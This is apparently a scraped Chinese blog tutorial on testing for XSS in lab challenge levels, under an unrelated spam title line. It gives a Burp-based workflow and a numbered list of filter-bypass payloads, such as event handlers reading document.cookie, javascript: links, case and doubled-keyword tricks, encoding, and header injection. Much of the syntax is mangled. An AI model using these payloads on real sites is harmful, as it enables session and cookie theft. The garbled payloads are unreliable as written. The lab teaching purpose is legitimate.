丽水网站制作公司,无代码开发平台的利与弊,安卓开发流程,平面设计免费自学网文章目录 测试流程1.开启burp2.测试常规xss语句3.观察回显4.测试闭合与绕过Level2Level3Level4Level5Level6Level7 5.xss绕过方法1)测试需观察点2)无过滤法3)闭合4)单引号闭合事件函数5)双引号闭合事件函数6)引号闭合链接7)大小写绕过8)多写绕过9)unicode编码10)unic… 文章目录 测试流程1.开启burp2.测试常规xss语句3.观察回显4.测试闭合与绕过Level2Level3Level4Level5Level6Level7 5.xss绕过方法1)测试需观察点2)无过滤法3)闭合4)单引号闭合事件函数5)双引号闭合事件函数6)引号闭合链接7)大小写绕过8)多写绕过9)unicode编码10)unicode编码//注释11)隐藏标签赋值12)referer注入13)UA头注入14)Cookie注入15)替换()16)实体编码绕过17)--!注释绕过 测试流程
先看bp 再看回显 测试常规xss语句 接着看F12上下文 然后是构造闭合 最后是依次测试绕过方法 成功的时候要能得到一个可以复现的url
1.开启burp
正常输入看响应包和发送包有没有相同点
如果没有进入第二步
2.测试常规xss语句
一般选即可或,或 οnclickalert(document.cookie) 只用做轮子测试如果还不行进入下一步
3.观察回显
比如上一步中输入输入框回显异常 4.测试闭合与绕过
Level2 F12观察输入框位置上下文
可以发现语句存在需要闭合的地方改成img srcjavascript:alert(‘XSS’)后语句看起来才正常
所以轮子应该类似{javascript}
Level3
//
此处使用了htmlspecialchars转义了等特殊字符使得尖括号里的代码不能执行如果找不到绕过方法只能执行事件函数比如onclick直接结束 转换为 “转换为” 转换为成为 ’ 转换为 转换为 由上可以看出单引号没有转义可以用它来做闭合 Level4
同上
Level5
发现过滤了on会在on之间插入_ri也被过滤 因此只能找不带on和
Level6
这关链接也被过滤但是可以通过大小写绕过 oNclickalert(document.cookie) 总结xss不要直接修改页面代码要在输入框中构造进而产生url链接
Level7
多写绕过 oonnclickalert(document.cookie) 以此步骤测试先看bp,再看回显接着看F12然后是看闭合最后是依次测试绕过方法
5.xss绕过方法
1)测试需观察点
浏览器左下角查看器查找注入点所在代码 burp响应包referer/UA/cookie三处位置看是否在提交包中有对应信息 xss不要直接修改页面代码要在输入框中构造进而产生url链接
2)无过滤法
3)闭合 4)单引号闭合事件函数
’ οnclick’ alert(“123”);
5)双引号闭合事件函数 οnclickalert(‘123’);
6)引号闭合链接
a hrefjavascript:alert(‘xss’)xss
7)大小写绕过
a hRefjavascript:alert(‘xss’)xss
8)多写绕过 oonnclickalert(‘123’);
9)unicode编码
javascript:alert(‘xss’) javascrIpt:alert(‘xss’)
10)unicode编码//注释
javascript:alert(‘xss’)//http://www.baidu.com javascript:alert(‘xss’)//http://
11)隐藏标签赋值
t_sort123 type“” οnclickalert(‘xss’)
12)referer注入
“ type”” οnclick”alert(document.cookie)
13)UA头注入
“ type”” οnclick”alert(document.cookie)
14)Cookie注入
“ οnclickalert(‘xss’) type”
15)替换()
16)实体编码绕过 https://www.qqxiuzi.cn/bianma/zifushiti.php 17)–!注释绕过
注释方式有两种:
